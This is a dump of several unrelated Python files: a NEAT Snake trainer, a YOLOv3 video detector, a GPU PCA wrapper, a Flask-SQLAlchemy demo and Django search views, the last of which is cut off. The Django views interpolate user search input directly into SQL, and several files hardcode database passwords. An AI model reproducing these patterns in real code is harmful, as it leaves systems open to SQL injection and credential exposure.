len(amount) > 2:\n ge[i].fitness -= 10\n game_close = True\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 3, y)\n pygame.display.update()\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n if counter > 12:\n ge[i] += 0.3\n clock.tick(snake_speed)\n if game_close == True:\n score = Length_of_snake -3\n ge[i].fitness += score*20\n # print(ge[i].fitness)\n remove(i)\n break\n \ndef eval_genomes(genomes, config):\n global snakes, ge, nets, i\n snakes = []\n ge = []\n nets = []\n y = 0\n for genome_id, genome in genomes:\n snakes.append(\"snake\")\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n genome.fitness = 0\n while y<= 10000000:\n for i, snake in enumerate(snakes):\n gameLoop(genomes, config, i, y)\n y += 1\n\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 10000000000)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"164681903","text":"from operator import itemgetter\nimport pandas as pd\n\niter=0\nwhile iter<100:\n data = pd.read_csv(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",delim_whitespace=\"\",header=None)\n list = []\n col1 = data[0]\n col2 = data[1]\n col3 = data[2]\n\n for i in range(len(data[0])):\n list.append((col1[i],col2[i],col3[i]))\n sort = sorted(list,key = lambda x:x[1],reverse=True)\n \n fp = open(\"result/set2/scores/rwr_result_set2_\"+str(iter)+\".txt\",\"w\")\n for i in range(len(sort)):\n row = sort[i]\n fp.write(str(row[0])+\",\"+str(row[1])+\",\"+str(row[2])+\"\\n\")\n iter+=1\n","sub_path":"prioritization_methods/rwr/randomize2/sort_res.py","file_name":"sort_res.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"437234155","text":"from Resultado import Resultado\nfrom Simulacion import Simulacion\nimport Operaciones\nimport os\nimport shutil\n\nmayoresGanancias = []\n\n\ndef CalculoSimulacion(rangoIni, rangoFinal, iteraciones):\n for i in range(1,iteraciones+1):\n simulacion = Simulacion(i)\n for mes in range(1,31):\n for revista in range(rangoIni, rangoFinal+1):\n resultado = Resultado(mes, revista)\n simulacion.AgregarResultado(resultado)\n\n simulacion.Imprimir()\n mayoresGanancias.append(simulacion.Get_GananciaMayor())\n\n Operaciones.ImprimirGanancias(mayoresGanancias)\n \ndef IniciarPrograma():\n try:\n print('Simulacion de la segunda política, desde el numero inicial de revistas x hasta y: \\n')\n iteraciones = int(input('Ingrese el número de simulaciones que deseas realizar:'))\n revistaInicial = int(input('Ingrese mínimo de número de revistas inicial:'))\n revistaFinal = int(input('Ingrese el máximo de revistas iniciales:'))\n\n if revistaFinal < revistaInicial:\n print('Ingrese un rango valido.')\n else:\n CalculoSimulacion(revistaInicial, revistaFinal, iteraciones)\n except Exception as e: \n print(\"Ha ocurrido un error por favor intente nuevamente\")\n print(\"Detalle del error:\", e)\n\nerror = False\nfolder = 'output/'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception:\n if error is False:\n print(\"El programa no ha podido eliminar todos los archivos excel, por favor cierrelos e intente nuevamente.\")\n error = True\n\nif error is False:\n IniciarPrograma()\n\n\n\n","sub_path":"politicaUno/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"341797997","text":"import cv2 as cv \nimport numpy as np \nimport random as rng\nimport darknet\nimport os\n\nrng.seed(12345)\n\nvideoPath = \"VID.mp4\"\nconfigPath = \"YOLOv3/yolov3.cfg\"\nweightPath = \"YOLOv3/yolov3.weights\"\n# configPath = \"YOLOv3/yolov3-tiny.cfg\"\n# weightPath = \"YOLOv3/yolov3-tiny.weights\"\nclassesPath = \"YOLOv3/coco.names\"\n\nif not os.path.exists(videoPath):\n raise ValueError(\"Invalid video path `\" + os.path.abspath(videoPath) + \"`\")\nif not os.path.exists(configPath):\n raise ValueError(\"Invalid config path `\" + os.path.abspath(configPath) + \"`\")\nif not os.path.exists(weightPath):\n raise ValueError(\"Invalid weight path `\" + os.path.abspath(weightPath) + \"`\")\nif not os.path.exists(classesPath):\n raise ValueError(\"Invalid classes path `\" + os.path.abspath(classesPath) + \"`\")\n\nwith open(classesPath, 'rt') as f:\n classes = f.read().rstrip('\\n').split('\\n')\n\nconfThreshold = 0.5\nnmsThreshold = 0.4\ninpWidth = 320\ninpHeight = 320\n\nnet = cv.dnn.readNetFromDarknet(configPath, weightPath)\nnet.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)\n# 获取输出层的名字\ndef getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# 取最大置信度的Bounding Box返回\n# 该函数不用了\ndef process(outs):\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n classIds.append(classId)\n confidences.append(float(confidence))\n \n if len(classIds) != 0:\n index = np.argsort(confidences)[-1]\n classId = classIds[index]\n # print(classes[classId], f'{confidences[index]:.2f}')\n label = f'{classes[classId]} {confidences[index]:.2f}'\n return label\n return None\n\ndef postProcess(roi, outs):\n height, width, channel = roi.shape\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n center_x = (int)(detection[0] * width)\n center_y = (int)(detection[1] * height)\n box_width = (int)(detection[2] * width)\n box_height = (int)(detection[3] * height)\n left = (int)(center_x - box_width / 2)\n top = (int)(center_y - box_height / 2)\n classIds.append(classId)\n confidences.append((float)(confidence))\n boxes.append([left, top, box_width, box_height])\n box_result = []\n conf_result = []\n class_result = []\n index = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\n for i in index:\n i = i[0]\n box_result.append(boxes[i])\n conf_result.append(confidences[i])\n class_result.append(classes[classIds[i]])\n \n print(class_result)\n return box_result, conf_result, class_result\n\ndef transform(box, roi_x, roi_y):\n for b in box:\n b[0] += roi_x\n b[1] += roi_y\n\n\nsurf = cv.xfeatures2d.SURF_create(1000)\n# surf = cv.xfeatures2d.SURF_create()\nFLANN_INDEX_KDTREE = 1\nMIN_MATCH_COUNT = 10\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 32)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\ncv.namedWindow(\"match\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame1\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"frame2\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"after dilate\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"draw contours\", cv.WINDOW_NORMAL)\n# cv.namedWindow(\"kp\", cv.WINDOW_NORMAL)\ncv.namedWindow(\"dst\", cv.WINDOW_NORMAL)\n\ncapture = cv.VideoCapture(videoPath)\nif not capture.isOpened():\n print(\"can not open the video\")\n exit()\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\nret, frame2 = capture.read()\nrows, cols, ch = frame2.shape\nprint(\"rows = \", rows, \" cols = \", cols)\nframe2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\nframe2_gray = cv.blur(frame2_gray, (5, 5))\nkp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n\nRECT_MIN_WIDTH = 20\nRECT_MIN_HIGHT = 20\n\n# test = True\ntest = False\n\nwhile True:\n frame1 = frame2\n frame1_gray = frame2_gray\n kp1 = kp2\n des1 = des2\n\n ret, frame2 = capture.read()\n if not ret:\n break\n \n frame2_gray = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n frame2_gray = cv.blur(frame2_gray, (5, 5))\n\n # kp1, des1 = surf.detectAndCompute(frame1, None)\n kp2, des2 = surf.detectAndCompute(frame2_gray, None)\n\n # 绘制特征点\n # kp_img = frame2.copy()\n # kp_img = cv.drawKeypoints(kp_img, kp2, kp_img)\n # cv.imshow(\"kp\", kp_img)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/key_points.jpg\", kp_img)\n # print(\"OK\");\n\n matches = flann.knnMatch(des1, des2, k = 2)\n # print(len(matches))\n good = []\n for m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n if len(good) > MIN_MATCH_COUNT:\n frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n print(M)\n \n matches_mask = mask.ravel().tolist()\n \n warp = cv.warpPerspective(frame1, M, (cols, rows))\n # cv.imshow(\"warp\", warp);\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/warp.jpg\", warp)\n # print(\"OK\")\n\n sub = cv.absdiff(frame2, warp)\n # cv.imshow(\"sub\", sub)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/sub.jpg\", sub)\n # print(\"OK\")\n\n sub = sub[20:rows - 20, 20:cols - 20]\n\n # con_img = sub.copy()\n\n # 通过实验测试,先进行阈值处理然后再转换成灰度图的效果\n # 比先转换成灰度图后再进行阈值处理的效果好\n ret2, dst = cv.threshold(sub, 50, 255, cv.THRESH_BINARY)\n dst_gray = cv.cvtColor(dst, cv.COLOR_BGR2GRAY)\n # dst_gray = cv.cvtColor(sub, cv.COLOR_BGR2GRAY)\n # ret2, dst_gray = cv.threshold(dst_gray, 80, 255, cv.THRESH_BINARY)\n\n # cv.imshow(\"threshold\", dst_gray)\n\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n dst_gray = cv.morphologyEx(dst_gray, cv.MORPH_DILATE, kernel)\n cv.imshow(\"after dilate\", dst_gray)\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/dilate.jpg\", dst_gray)\n print(\"OK\")\n\n # edges = cv.Canny(dst, 300, 450)\n # cv.imshow(\"edges\", edges)\n contours, hierarchy = cv.findContours(dst_gray, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n # cv.drawContours(con_img, contours, -1, 255, 1)\n # cv.imshow(\"draw contours\", con_img)\n if hierarchy is None:\n continue\n \n temp = frame2[20:rows - 20, 20:cols - 20].copy()\n for c in contours:\n rect = cv.boundingRect(c)\n color = (rng.randint(0, 255), rng.randint(0, 255), rng.randint(0, 255))\n x, y, w, h = rect\n # if cv.contourArea(c) > 200 and w < RECT_MAX_WIDTH and h < RECT_MAX_HIGHT \\\n # and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n if cv.contourArea(c) > 200 and w > RECT_MIN_WIDTH and h > RECT_MIN_HIGHT and w * h > 5000:\n label = None\n box = []\n if not test:\n roi = temp[y:y+h, x:x+w]\n blob = cv.dnn.blobFromImage(roi, 1/255, (inpWidth, inpHeight), [0, 0, 0], 1, crop=False)\n net.setInput(blob)\n outputName = getOutputsNames(net)\n outs = net.forward(outputName)\n # label = process(outs)\n box, conf, cla = postProcess(roi, outs)\n transform(box, x, y)\n t, _ = net.getPerfProfile()\n # print(\"Inference time: %.2f ms\" % (t * 1000.0 / cv.getTickFrequency()))\n\n if len(box) > 0:\n for i, b in enumerate(box):\n label = f'{cla[i]} {conf[i]:.2f}'\n tex_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n cv.rectangle(temp, (b[0], b[1]), (b[0] + b[2], b[1] + b[3]), color, 2)\n cv.rectangle(temp, (b[0], b[1] - tex_size[1]), (b[0] + tex_size[0], b[1]), color, cv.FILLED)\n cv.putText(temp, label, (b[0], b[1]), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n else:\n cv.rectangle(temp, (x, y), (x + w, y + h), color, 2)\n # if label and not test:\n # text_size, baseLine = cv.getTextSize(label, cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)\n # cv.rectangle(temp, (x, y - text_size[1]), (x + text_size[0], y), color, cv.FILLED)\n # cv.putText(temp, label, (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\n totalFrame = (int)(capture.get(cv.CAP_PROP_FRAME_COUNT))\n frameNum = (int)(capture.get(cv.CAP_PROP_POS_FRAMES))\n if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n cv.imwrite(\"pic/rect3.jpg\", temp)\n print(\"OK\")\n text = \"current frame: \" + str(frameNum) + \"/\" + str(totalFrame)\n cv.putText(temp, text, (5, 20), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1)\n cv.imshow(\"dst\", temp)\n\n else:\n print(\"not enough matches are found - {}/{}\".format(len(good), MIN_MATCH_COUNT))\n matches_mask = None\n \n # draw_params = dict(matchColor = (0, 255, 0),\n # singlePointColor = None,\n # matchesMask = matches_mask,\n # flags = 2)\n # match = cv.drawMatches(frame1, kp1, frame2, kp2, good, None, **draw_params)\n\n # cv.imshow(\"match\", match)\n # if (int)(capture.get(cv.CAP_PROP_POS_FRAMES)) == 166:\n # cv.imwrite(\"pic/match.jpg\", match)\n # print(\"OK\")\n\n key = cv.waitKey(20)\n if key == ord('q'):\n break\n if key == ord('s'):\n cv.imwrite(\"pic/absdiff.jpg\", sub)\n if key == ord('m'):\n cv.imwrite(\"pic/match.jpg\", match)\n if key == ord('t'):\n cv.imwrite(\"pic/threshold.jpg\", dst_gray)\n \ncapture.release()\ncv.destroyAllWindows()\n\n","sub_path":"main_yolov3.py","file_name":"main_yolov3.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"299437490","text":"# - * - encoding : utf - 8 - * -\n\"\"\"\n:copyright: 2017 H2O.ai, Inc.\n:license: Apache License Version 2.0 (see LICENSE for details)\n\"\"\"\nimport numpy as np\nfrom ..libs.lib_pca import parameters\nfrom ..solvers.utils import _setter\nfrom ..solvers.truncated_svd import TruncatedSVDH2O, TruncatedSVD, _as_fptr\nfrom ..utils.extmath import svd_flip\n\n\nclass PCAH2O(TruncatedSVDH2O):\n \"\"\"Principal Component Analysis (PCA)\n\n Dimensionality reduction using truncated Singular Value Decomposition\n for GPU\n\n This implementation uses the ARPACK implementation of the truncated SVD.\n Contrary to SVD, this estimator does center the data before computing\n the singular value decomposition.\n\n :param: n_components Desired dimensionality of output data\n\n :param: whiten : bool, optional\n When True (False by default) the `components_` vectors are multiplied\n by the square root of (n_samples) and divided by the singular values to\n ensure uncorrelated outputs with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n \"\"\"\n\n def __init__(self, n_components=2, whiten=False):\n super().__init__(n_components)\n self.whiten = whiten\n self.n_components_ = n_components\n self.mean_ = None\n self.noise_variance_ = None\n\n # pylint: disable=unused-argument\n def fit(self, X, y=None):\n \"\"\"Fit PCA on matrix X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param y Ignored, for ScikitLearn compatibility\n\n :returns self : object\n\n \"\"\"\n self.fit_transform(X)\n return self\n\n # pylint: disable=unused-argument\n def fit_transform(self, X, y=None):\n \"\"\"Fit PCA on matrix X and perform dimensionality reduction\n on X.\n\n :param: X {array-like, sparse matrix}, shape (n_samples, n_features)\n Training data.\n\n :param: y Ignored, for ScikitLearn compatibility\n\n :returns X_new : array, shape (n_samples, n_components)\n Reduced version of X. This will always be a\n dense array.\n\n \"\"\"\n X = np.asfortranarray(X, dtype=np.float64)\n Q = np.empty(\n (self.n_components, X.shape[1]), dtype=np.float64, order='F')\n U = np.empty(\n (X.shape[0], self.n_components), dtype=np.float64, order='F')\n w = np.empty(self.n_components, dtype=np.float64)\n explained_variance = np.empty(self.n_components, dtype=np.float64)\n explained_variance_ratio = np.empty(self.n_components, dtype=np.float64)\n mean = np.empty(X.shape[1], dtype=np.float64)\n param = parameters()\n param.X_m = X.shape[0]\n param.X_n = X.shape[1]\n param.k = self.n_components\n param.whiten = self.whiten\n\n lib = self._load_lib()\n lib.pca(\n _as_fptr(X), _as_fptr(Q), _as_fptr(w), _as_fptr(U),\n _as_fptr(explained_variance), _as_fptr(explained_variance_ratio),\n _as_fptr(mean), param)\n\n self._w = w\n self._U, self._Q = svd_flip(U, Q) # TODO Port to cuda?\n self._X = X\n n = X.shape[0]\n # To match sci-kit #TODO Port to cuda?\n self.explained_variance = self.singular_values_**2 / (n - 1)\n self.explained_variance_ratio = explained_variance_ratio\n self.mean_ = mean\n\n # TODO noise_variance_ calculation\n # can be done inside lib.pca if a bottleneck\n n_samples, n_features = X.shape\n total_var = np.var(X, ddof=1, axis=0)\n if self.n_components_ < min(n_features, n_samples):\n self.noise_variance_ = \\\n (total_var.sum() - self.explained_variance_.sum())\n self.noise_variance_ /= \\\n min(n_features, n_samples) - self.n_components\n else:\n self.noise_variance_ = 0.\n\n X_transformed = U * w\n return X_transformed\n\n # Util to load gpu lib\n def _load_lib(self):\n from ..libs.lib_pca import GPUlib\n\n gpu_lib = GPUlib().get()\n\n return gpu_lib\n\n\nclass PCA(TruncatedSVD):\n \"\"\"\n PCA Wrapper\n\n Selects between h2o4gpu.decomposition.PCASklearn\n and h2o4gpu.solvers.pca.PCAH2O\n\n Documentation:\n import h2o4gpu.decomposition ;\n help(h2o4gpu.decomposition.PCASklearn)\n help(h2o4gpu.solvers.pca.PCA)\n\n :param: backend : Which backend to use. Options are 'auto', 'sklearn',\n 'h2o4gpu'. Default is 'auto'.\n Saves as attribute for actual backend used.\n\n \"\"\"\n\n # pylint: disable=unused-argument\n def __init__(self,\n n_components=2,\n copy=True,\n whiten=False,\n svd_solver=\"arpack\",\n tol=0.,\n iterated_power=\"auto\",\n random_state=None,\n verbose=False,\n backend='auto'):\n super().__init__(n_components, random_state, tol, verbose, backend)\n self.svd_solver = svd_solver\n self.whiten = whiten\n\n import os\n _backend = os.environ.get('H2O4GPU_BACKEND', None)\n if _backend is not None:\n backend = _backend\n\n # Fall back to Sklearn\n # Can remove if fully implement sklearn functionality\n self.do_sklearn = False\n if backend == 'auto':\n params_string = [\n 'svd_solver', 'random_state', 'tol', 'iterated_power'\n ]\n params = [svd_solver, random_state, tol, iterated_power]\n params_default = ['arpack', None, 0., 'auto']\n\n i = 0\n for param in params:\n if param != params_default[i]:\n self.do_sklearn = True\n if verbose:\n print(\"WARNING:\"\n \" The sklearn parameter \" + params_string[i] +\n \" has been changed from default to \" +\n str(param) + \". Will run Sklearn PCA.\")\n self.do_sklearn = True\n i = i + 1\n elif backend == 'sklearn':\n self.do_sklearn = True\n elif backend == 'h2o4gpu':\n self.do_sklearn = False\n if self.do_sklearn:\n self.backend = 'sklearn'\n else:\n self.backend = 'h2o4gpu'\n\n from h2o4gpu.decomposition.pca import PCASklearn\n self.model_sklearn = PCASklearn(\n n_components=n_components,\n copy=copy,\n whiten=whiten,\n svd_solver=svd_solver,\n tol=tol,\n iterated_power=iterated_power,\n random_state=random_state)\n self.model_h2o4gpu = PCAH2O(n_components=n_components, whiten=whiten)\n\n if self.do_sklearn:\n self.model = self.model_sklearn\n else:\n self.model = self.model_h2o4gpu\n\n def set_attributes(self):\n s = _setter(oself=self, e1=NameError, e2=AttributeError)\n s('oself.components_ = oself.model.components_')\n s('oself.explained_variance_= oself.model.explained_variance_')\n s('oself.explained_variance_ratio_ = '\n 'oself.model.explained_variance_ratio_')\n s('oself.singular_values_ = oself.model.singular_values_')\n s('oself.mean_ = oself.model.mean_')\n s('oself.n_components_ = oself.model.n_components_')\n s('oself.noise_variance_ = oself.model.noise_variance_')\n","sub_path":"src/interface_py/h2o4gpu/solvers/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"233540736","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\n# 配置数据库连接地址\napp.config['SQLALCHEMY_DATABASE_URI'] = \"mysql://root:mysql@127.0.0.1:3306/test_27\"\n# 是否追踪数据库的修改\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n# 初始化 SQLAlchemy 对象\ndb = SQLAlchemy(app)\n\n\n# 角色 1的一方\nclass Role(db.Model):\n # 指定该模型对应数据库中的表名,如果不指定为类名小写\n __tablename__ = \"roles\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # backref 在这行代码的作用是:给前面的 User添加一个属性,名字叫backref的值\n # 以便可以直接通过 user.role 方法到一的一方的数据\n users = db.relationship('User', backref='role')\n\n def __repr__(self):\n return 'Role %d %s' % (self.id, self.name)\n\n# service mysql restart\n# service mysql stop\n# service mysql start\n# 用户 多的一方\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64), unique=True)\n # 添加外键记录一的一方的主键id,为了能够直接查询出一的一方的数据\n role_id = db.Column(db.Integer, db.ForeignKey(Role.id))\n\n def __repr__(self):\n return 'User %d %s' % (self.id, self.name)\n\n\n\n\n\n# 需求,查询user所对应的role数据\n# select * from role where id = user.role_id\n\n# 需求,查询role所对应的所有user数据\n# select * from user where role_id = role.id\n\n@app.route('/')\ndef index():\n return 'index'\n\n\nif __name__ == '__main__':\n db.drop_all()\n db.create_all()\n\n ro1 = Role(name='admin')\n ro2 = Role(name='user')\n db.session.add_all([ro1, ro2])\n db.session.commit()\n\n user1 = User(name='laowang', role_id=ro1.id)\n user2 = User(name='laoli', role_id=ro1.id)\n user3 = User(name='laozhang', role_id=ro2.id)\n\n db.session.add_all([user1, user2, user3])\n db.session.commit()\n\n app.run(debug=True)\n","sub_path":"Flask_Demo_All/Flask_day03/demo6_sqlalchemy.py","file_name":"demo6_sqlalchemy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"402969648","text":"from django.shortcuts import render, redirect\nfrom med.models import Manager, Engineer, Doctor\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserUpdateForm\n\n\n# Create your views here.\ndef home(request):\n # try : \n #print(x) not defind\n #except:\n #print('error') excute\n try:\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : doc})\n elif(request.user.type =='MANAGER'):\n man = Manager.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/home.html', context={'user' : man})\n except:\n return render(request, template_name='dashboard/HomePage.html')\n \n \n@login_required\ndef profile(request):\n if(request.user.type == 'ENGINEER'):\n eng = Engineer.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : eng})\n elif(request.user.type == 'DOCTOR'):\n doc = Doctor.objects.get(id = request.user.id)\n return render(request, template_name='dashboard/profile.html', context={'user' : doc})\n else:\n return render(request, template_name='dashboard/profile.html')\n\n@login_required\ndef update_profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST,request.FILES, instance=request.user)\n if u_form.is_valid():\n u_form.save()\n # messages.success(request, f'Account Info Updated!!')\n return redirect('profile')\n else:\n # messages.faliure(request, f'An error has occured!')\n return redirect('profile')\n \n context = {\n 'u_form' : UserUpdateForm(instance=request.user),\n }\n return render(request, \"dashboard/update_profile.html\", context) ","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"180253337","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom sqlalchemy import MetaData, create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom collections import namedtuple, defaultdict\nfrom py2neo import Graph, Relationship, NodeMatcher, Node\nfrom django.contrib.postgres.search import SearchVector\nfrom django.contrib.auth import get_user_model\nfrom account.models import Profile\n\nUser = get_user_model()\n\ngraph = Graph(host='neo4j_db', password='_genius01_', scheme='bolt')\n\nmeta = MetaData()\nengine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/keywordsdw')\nconn = engine.connect()\n\npub_engine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/pubdw')\npubconn = pub_engine.connect()\n\nResearcher = namedtuple('Researcher', ['id', 'firstname', 'lastname',\n 'word_en', 'count', 'affiliation',\n 'total_abstract' ,'sc'])\n\n# Create your views here.\ndef res_list(request):\n search_term = request.GET.get('q')\n res_list = []\n nounchunks = []\n if search_term:\n if len(search_term.split(' ')) > 1:\n tsquery = ' & '.join(search_term.split(' '))\n tsquery_word = ' | '.join(search_term.split(' '))\n else:\n tsquery = search_term\n tsquery_word = search_term\n query = (\"select id, chunk_en from noun_chunks where \"\n \"to_tsvector(chunk_en) @@ to_tsquery('%s');\")\n nounchunks += conn.execute(query % tsquery).fetchall()\n results = conn.execute(\"select distinct keywords.id, first_name, last_name, word_en, count, affils.name\"\n \" from keywords inner join affils on keywords.affil_scopus_id=affils.scopus_id \"\n \"where to_tsvector(word_en) @@ to_tsquery('%s')\"\n \" order by count desc\" % tsquery_word).fetchall()\n if results:\n for rec in results:\n query = ('select count(*) from abstracts inner join abstract_has_keywords '\n 'on abstract_has_keywords.abstract_id=abstracts.id '\n 'inner join keywords on keywords.id=abstract_has_keywords.keyword_id '\n 'where keywords.id=%d;')\n total_abstract = conn.execute(query % int(rec[0])).scalar()\n\n fname = rec[1].replace(\"'\", \"\\'\") if rec[1] else ''\n lname = rec[2].replace(\"'\", \"\\'\") if rec[2] else ''\n\n query = (\"select id,scholarship_info_id from authors where lower(first_name)=lower(%s) \"\n \"and lower(last_name)=lower(%s)\")\n _author = conn.execute(query, (fname, lname)).fetchone()\n if _author:\n _author_id, _sc_id = _author[0], _author[1]\n if _author_id:\n if _sc_id:\n sc = True\n else:\n sc = False\n res_list.append(Researcher(_author_id, rec[1], rec[2], rec[3], rec[4], rec[5], total_abstract, sc))\n\n\n profiles = {}\n for word in search_term.split(' '):\n for p in Profile.objects.annotate(\n search=SearchVector('field_of_interest')).filter(search=word):\n field_of_interest = (f.strip() for f in p.field_of_interest.split(','))\n profiles[p.user.username] = (p.user.first_name, p.user.last_name, field_of_interest)\n\n authors = []\n query = (\"select id, first_name,last_name from authors where \"\n \"lower(first_name)=lower(%s) or lower(last_name)=lower(%s);\")\n for id, first_name, last_name in conn.execute(query, (search_term,search_term)):\n authors.append((id,first_name,last_name))\n\n return render(request, template_name='analytics/res_list.html',\n context={'search_term': search_term, 'results': res_list,\n 'nounchunks': nounchunks, 'profiles': profiles,\n 'authors': authors})\n\ndef noun_chunk_detail(request):\n nc_id = request.GET.get('ncid')\n abstracts_list = []\n if nc_id:\n nc = conn.execute('select chunk_en from noun_chunks where id=%d' % int(nc_id)).fetchone()[0]\n query = (\"select abstracts.id, title_en, pub_date, cited from abstracts \"\n \"inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id \"\n \"inner join noun_chunks on noun_chunks.id=abstract_has_nounchunk.noun_chunk_id \"\n \"where noun_chunks.id=%d;\")\n for rec in conn.execute(query % int(nc_id)).fetchall():\n _bag = {'abstract': rec}\n _bag['authors'] = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n _bag['nounchunks'] = conn.execute(\"select noun_chunks.* from abstracts inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id inner join \"\n \"noun_chunks on abstract_has_nounchunk.noun_chunk_id=noun_chunks.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n abstracts_list.append(_bag)\n\n else:\n nc = ''\n return render(request, template_name='analytics/nounchunk_abs.html',\n context={'noun_chunk': nc, 'abstracts': abstracts_list})\n\ndef show_profile(request, author_id):\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n author = conn.execute('select * from authors where id=%s' % author_id).fetchone()\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n author_scopus_id = 